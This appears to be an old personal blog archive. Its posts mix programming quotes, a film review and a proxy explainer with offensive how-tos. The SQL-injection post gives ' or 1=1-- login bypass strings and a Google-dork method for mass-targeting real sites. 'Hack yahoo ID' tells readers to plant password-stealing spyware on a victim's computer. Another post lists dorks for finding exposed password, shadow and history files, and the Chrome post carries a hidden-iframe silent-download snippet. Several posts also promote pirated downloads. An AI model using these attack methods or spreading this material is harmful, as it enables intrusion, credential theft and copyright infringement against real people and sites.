me n my thoughts

How to Download MP3’s from WWW using Google

2009-03-23T21:18:00.000-07:00

There is always a lot of search queries on Google for free mp3’s. Unfortunately a direct search for free mp3’s always leads to a wild goose chase that will not get you to the source of the mp3’s that you want. What then is the secret behind getting mp3’s on the internet?

Actually it is fairly easy to get hold of mp3’s by searching in site directories. this search with a little modification will also help locate pdf’s photo’s spreadsheets and more.

Let’s start with a easy search. Type into Google the following:

?intitle:index.of? mp3 [artist] [title]

Replace [artist] with the artist/singer/band you’re looking for and [title] with the song title. Just one of them also fine.

As if by magic, a list of mp3’s with your search terms will appear. You can download the file by right clicking on it and then select save as.

As an alternative, you can also use the following query to search MP3 on the web:

“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums [artist] [title]

Same as above, just replace [artist] and [title] with the artist/singer/band name and the song title.

A third search term is as follow:

?inurl:multiply.com/music? [artist] [title]

And a last one that will also work just fine:

-inurl:(htm|html|php) intitle:”index of” +”last modified” +”parent directory” +description +size +(.mp3|.wma) [artist] [title]

Happy hunting

Favorite Programming Quotes

2008-11-01T09:55:00.000-07:00

The first 90 percent of the code accounts for the first 90 percent of the development time…The remaining 10 percent of the code accounts for the other 90 percent of the development time.
Tom Cargill

Most of you are familiar with the virtues of a programmer. There are three, of course: laziness, impatience, and hubris.
Larry Wall

Measuring programming progress by lines of code is like measuring aircraft building progress by weight.
Bill Gates

Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.
Brian W. Kernighan

Once a new technology starts rolling, if you’re not part of the steamroller, you’re part of the road.
Stewart Brand

In theory, there is no difference between theory and practice. But, in practice, there is.
Jan L. A. van de Snepscheut

The hardest part of design … is keeping features out.
Donald Norman

Before software can be reusable it first has to be usable.
Ralph Johnson

If debugging is the process of removing bugs, then programming must be the process of putting them in.
Edsger Dijkstra

Software and cathedrals are much the same - first we build them, then we pray.
Anonymous Preacher

The goal of Computer Science is to build something that will last at least until we’ve finished building it.
Anonymous Consultant

The software isn’t finished until the last user is dead.
Anonymous Support Group Member

Better train people and risk they leave - than do nothing and risk they stay.
Anonymous Technical Trainer

Programming is 10% science, 20% ingenuity, and 70% getting the ingenuity to work with the science.
Anonymous Scientist

All programmers are playwrights and all computers are lousy actors.
Anonymous Hack Actor

Bad code isn’t bad, its just misunderstood.
Anonymous Code Behaviorist

It is easier to measure something than to understand what you have measured.
Anonymous Analyst

The sooner you get behind in your work, the more time you have to catch up.
Anonymous Scheduler

When a programming language is created that allows programmers to program in simple English, it will be discovered that programmers cannot speak English.
Anonymous Linguist

Benchmarks don’t lie, but liars do benchmarks.
Anonymous Tester

Why do we never have time to do it right, but always have time to do it over?
Anonymous Code Monkey

15 Search Engines To Search Files on Rapidshare

2008-10-19T09:14:00.000-07:00

RapidShare is probably one of the biggest and fastest web hosters world wide. Rapidshare actually originated from rapidshare.de and switched over to rapidshare.com some time ago to give the web host a world wide recognized meaning. Still it lacks some basics features one of which is not providing the ability to search the hosted files.

15 Search Engines To Hunt Rapidshare Files

Rapidshare is a free for all web host where everyone can upload a file of their choice however to download a file you need a link to the rapidshare server where the file is actually hosted. This is good in terms of privacy but what if you want to download software, movies, music or ebooks of your choice and you don’t know the links. That is where these rapidshare search engines do the job for us. Just type in your your keywords and they will hunt down files relating to that keyword hosted on rapidshare.

Here is a complete list of 15 Rapidshare Search Engines. Use them well and have fun

This will definitely make it easy for you to search rapidshare files instead of using complex Google operators. Enjoy and use them wisely.

Anonymity of proxy server explained

2008-10-18T21:18:00.000-07:00

How does Proxy Server Works ?

This is the First Question that arises in our mind when we use the Proxy Servers for Surfing the Internet without revealing our Identity to Others. Here all these mindboggling questions are answered with easy to understand examples.

The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.

What your browser transmits to a web-server:
a name and a version of an operating system
a name and a version of a browser
configuration of a browser (display resolution, color depth, java / javascript support, …)
IP-address of a client
Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
a country where you are from
a city
your provider?s name and e-mail
your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).

These are some environment variables:

REMOTE_ADDR ? IP address of a client

HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.

HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.

HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)

HTTP_USER_AGENT ? so called “a user?s agent”. For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.

HTTP_HOST ? is a web server?s name

This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.

If a proxy server is not used, then environment variables look in the following way:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how environment variables “hided” by proxy servers, there are several types of proxies
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.
Anonymous Proxies

All proxy servers, that hide a client?s IP address in any way are called anonymous proxies

Simple Anonymous Proxies

These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These proxies are the most widespread among other anonymous proxy servers.

Distorting Proxies

As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies

These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.
Summary

Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!

List of all sql injection strings

2008-10-18T21:16:00.001-07:00

One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems .

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

Happy Hunting

Vulnerabilities of google chrome

2008-10-18T21:13:00.000-07:00

Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I’m not going to review Google Chrome’s features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few Hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just “evil:%” in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it’s worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn’t need Administrator rights to run.

Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I’m worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent’s used on its very first day.
The risk is high, fuzzers are still crunching…

Update:

Another Bug found.
<> document.write(’< src="”http://www.example.com/hello.exe”" frameborder="”0″" width="”0″" height="”0″">’); < / script >

This script should (I haven’t tested it yet, will do it later) trigger a silent download on the client machine.

The dark knight review

2008-10-11T00:42:00.001-07:00

You can read this review in the new issue of Southern Exposure Magazine:

"The Dark Knight"
by Ryan Smith

Comic book movies have been on a roller-coaster for the last ten years. “X-Men” was just ok, “X2” was good, “X-Men: The Last Stand” was forgettable. “Spider-Man” was decent, “Spider-Man 2” was fantastic, “Spider-Man 3” was average. “Superman Returns” was visually stimulating but narratively crippled. “Hulk” was better than people gave it credit for (haven’t seen the new one), “Hellboy” was great, “Hellboy II” was fun but not as good as the first, “300” was a two-hour music video, “Iron Man” was wonderful, “V For Vendetta” was better than expected, “Sin City” was nice to look at but gave me a stomach ache, and I hear “Daredevil”, “Fantastic Four”, “Catwoman”, and “The Punisher” aren’t worth my time.

So what about “Batman Begins”? Well, if you ask me, I think it’s towards the top of the list, easily one of the best comic book movies of all time. Director Christopher Nolan took a campy concept and turned it into an epic gothic drama that made you believe a grown man might just put on tights and fight crime (given the appropriate motivation).

But now “The Dark Knight” comes along and not only surpasses the first film, but manages to rise above every other comic book movie I can think of. I’ve been racking my brain and I just can’t come up with another that compares in terms of action, characters, narrative structure, and expectations. This is a truly satisfying movie.

Be warned though; the title is appropriate. This is one dark affair. Heath Ledger’s Joker is one of the most frightening movie villains in quite some time and Harvey Dent’s transformation into Two-Face is quite disturbing as well (just because Wal Mart carries Batman action figures doesn’t mean you should take your kids to this one). But for fans of the first film, you certainly won’t be disappointed here.

As I mentioned, Ledger (who is a shoe-in for a posthumous Oscar) is truly chilling. Forget the Joker you know, the one who wants to take over the world. Ledger’s Joker just wants to watch the world burn. A genuine anarchist, this skinny freak creates chaos not in the name of a particular creed, but for the sake of chaos itself. From the first scene, we know the clown in the purple suit isn’t one to mess with. And he proves to be a bona fide threat to Christian Bale’s Batman, who has been shunned by the city he strives to protect.

Unlike many films in the genre, “The Dark Knight” manages to dig deep into the human condition, dealing with authentic emotions such as loneliness and despair, and conflicting ideologies such as choice vs. chance and chaos vs. order. Like the first film, “The Dark Knight” makes it clear that it is our choices that define us.

This isn’t the best comic book movie of the year. “The Dark Knight” just swept away the competition to become the best comic book movie of all time.

Hack yahoo ID

2008-10-11T00:18:00.000-07:00

It is the easiest way to hack anyone's Yahoo ID's Password.

Follow these steps to hack the Yahoo ID

1. U have to make a server {spyware} given ur email id.

2. Send the server to the victim's computer anyhow.

3. When he will open it he cant realize that it was a spyware because after opening it, it will be deleted automatically.

4. After open this file, when he will go to login int his yahoo id his password and id will be send to ur given yahoo email id .

5. U can also disable his OS's many features .

There are three types of software by which u can make your own spyware {server]
U can download anyone and use it.

Files:

1. Y-Jacked
2. SH-Yahoo pass sender.
3. Yahoo Hack.

All about google

2008-10-11T00:15:00.000-07:00

When someone says Google, I think at least 60%-70% of people reply that it's a "Search Engine". Do you know that Google has so much thing going on that we don't even know it exist? Google has the ability to search for images, news, blogs, music, video, maps, products, answers, notebook, linux, apple, movies, definitions and the list goes on...

One thing I don't understand is why when we visit Google's URL (www.google.com), we only see a very simple and clean search page instead of a full featured page like Yahoo? At least now it's much better with a navigation bar where it shows Web, Images, Video, News, Maps, Gmail and more but it's still NOT complete.

Here's a quote taken from Don Norman's "The Truth About Google's Simplicity".

Why are Yahoo! and MSN such complex-looking places? Because their systems are easier to use. Not because they are complex, but because they simplify the life of their users by letting them see their choices on the home page: news, alternative searches, other items of interest. Yahoo! even has an excellent personalization page, so you can choose what you wish to see on that first page.

Take another careful look at Google's front page. Want a map? You have to click once to be offered the choice, then a second additional time to get to the map page. Want to use Google Scholar to check references? Um, well, is that "Advanced Search" or "more." What about their newly announced blog search? Why is Google maps separate from Google Earth? (Oh, those were purchased from different companies. Yes, but why should I, the user, care about the history of Google's acquisitions?)

Anyway, continue reading to check out the list of free and hidden services offered by google in ONE page.

Simply Google has created a page that includes every Google hidden feature.

Chris McEvoy created the original Simply Google but the latest updated version is at the link below. It has more links compared to the original version.

If your web browser's start page is Google.com, you might want to change it to Simply Google because it's more complete than the original and simple Google.com page.

[ Visit Simply Google ]

Hack Rapidshare and all other file hosting websites

2008-10-11T00:13:00.000-07:00

Universal Share Downloader (USDownloader), also called RapidShare downloader or MyTempDir downloader is actually not a crack or hack program. Instead, Universal Share Downloader is a download manager for automated download a list of files from most popular free uploaders or free unlimited upload files hosting servers such as RapidShare, MegaUpload, YouSendIt, FileFactory and etc.

Normally, if you’re not premium member or paid member or upgraded member of the free unlimited or one-click file hosting, web space and file delivery service, the service will has some limitations when you try to download the files from the server, such as no concurrent parallel download, so you have to download one file after another file has finished downloading. Beside, you’re also limited to certain download bandwidth limit based on time and IP address, download time delay (reserve “download ticket” system and no instant download start) and slower download speed.

AllFiles, Audiofind, Badongo, BestSharing, Come2Store, Datenko, DepositFiles, EasySharing, FileDepartment, FileFactory, FileHD, FileSpace, GetFileBiz, HemenPaylas, HyperUpload, iFolder, MegaShares, MegaUpload, MyTempDir, Quickdump, Rapidfile.fr, RapidShare, RapidUpload, RecFile, SaveFile, Sendmefile, SexUploader, ShareAm, SimpleUpload, Slil, SpbLand, StoreandServe, SupaShare, TurboShare, TurboUpload, UniversalVideo, Upfile, Upload2, Uploading, UploadPort, UploadSend, WebFile, WebFileHost, YourFile, YourFileHost, YourFileLink, YouSendIt and zShare

Note: For proxy servers list, you can download a software called GeoWhere and use GeoWhere to search for available proxy servers on the Internet, and put all the found proxies into a text file. You should use only anonymous proxy, as transparent proxy will reveal your IP address too. Alternatively, several websites has a long list of open public proxy servers that can be used by the USDownloader such as Proxy.6te.net, Proxy.org. Proxy List even allows you to download list of proxy servers in a text file format (remember to download only anonymous or elite proxy by searching for the type before downloading).

Best of all, Universal Share Downloader is a freeware, and no installation needed. Just download the Universal Share Downloader v 1.3.4 Beta 8 zip file , extract it and run the USDownloader.exe. The few limitation of Universal Share Downloader include unable to download normal download links (it works on those file sharing/hosting services only), and it itself yet to support parallel, concurrent and multi-threaded downloading in current (1.3.3) version (to enable it now, you have to launch multiple USDownloader.exe)

Homepage (in Russian): Universal Share Downloader

Download torrent using google

2008-10-11T00:11:00.001-07:00

Who wouldn't know what Google is? I bet EVERYONE knows! Google is the, in my opinion, the best and most powerful search engine. Google is so powerful in searching that you can search for backdoor passwords, live webcam and etc through Google Hacking. I've even posted a tip on how to search and download MP3 using Google. Believe it or not, there's a website Toorgle, the web interface looks quite similar to Google, is able to search up to 200+ torrent websites and it now has over 5,000,000 torrents indexed. If you don't want to use software to do searches such as Torrent Harvester, you can try Toorgle.
Looks familiar eh? You can even add Toorgle to Firefox search bar. Meaning you can directly search for torrents by typing the keywords on the searchbar. Don't need to type the whole URL and wait for the website finish loading in order to make a search.

Edit any website you want

2008-10-11T00:08:00.000-07:00

This is a java script which allows u to edit any website........ change every text in the website.... but not save it!!!!!

1. Go to any website

2. Paste the below code in the address bar of your browser

3. You can edit the website , but you cannot save it.

CODE:

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

Google search tips for hacking

2008-10-11T00:05:00.000-07:00

Google search engine can be used to hack into remote servers or gather confidential or sensitive information which are not visible through common searches.

Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results.

Google’s Advanced Search Query Syntax

Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data.

[ intitle: ]

The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.

intitle: login password

will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page.

Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title.

intitle: login intitle: password

is same as

allintitle: login password

[ inurl: ]

The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.

Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it.

allinurl: etc/passwd

will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.

[ site: ]

The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.

exploits site:hackingspirits.com

will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.

[ filetype: ]

This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).

filetype:doc site:gov confidential

will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.

[ link: ]

“link:” syntax will list down webpages that have links to the specified webpage.

link:www.expertsforge.com

will list webpages that have links pointing to the SecurityFocus homepage. Note there can be no space between the "link:" and the web page url.

[ related: ]

The “related:” will list web pages that are "similar" to a specified
web page.

related:www.expertsforge.com

will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url.

[ cache: ]

The query “cache:” will show the version of the web page that Google
has in its cache.

cache:www.hackingspirits.com

will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.

If you include other words in the query, Google will highlight those words within the cached document.

cache:www.hackingspirits.com guest

will show the cached content with the word "guest" highlighted.

[ intext: ]

The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles.

intext:exploits

will return only links to those web pages that has the search keyword "exploits" in its webpage.

[ phonebook: ]

“phonebook” searches for U.S. street address and phone number information.

phonebook:Lisa+CA

will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering.

Google Hacks

Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.

Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.

Index Of

Using “Index of ” syntax to find sites enabled with Index browsing

A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.

Index of /admin
Index of /passwd
Index of /password
Index of /mail

"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess

"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"

Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.

b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.

d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.

For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following
links: http://www.securiteam.com/securitynews/6M00H2K5PG.html

Other similar search using “inurl:” or “allinurl:” combined with other syntax

inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php

inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

Other similar search using “intitle:” or “allintitle:” combined with other syntax

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

Other interesting Search Queries

· To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks:

allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php

To search for sites vulnerable to SQL Injection attacks:

allinurl:/privmsg.php
allinurl:/privmsg.php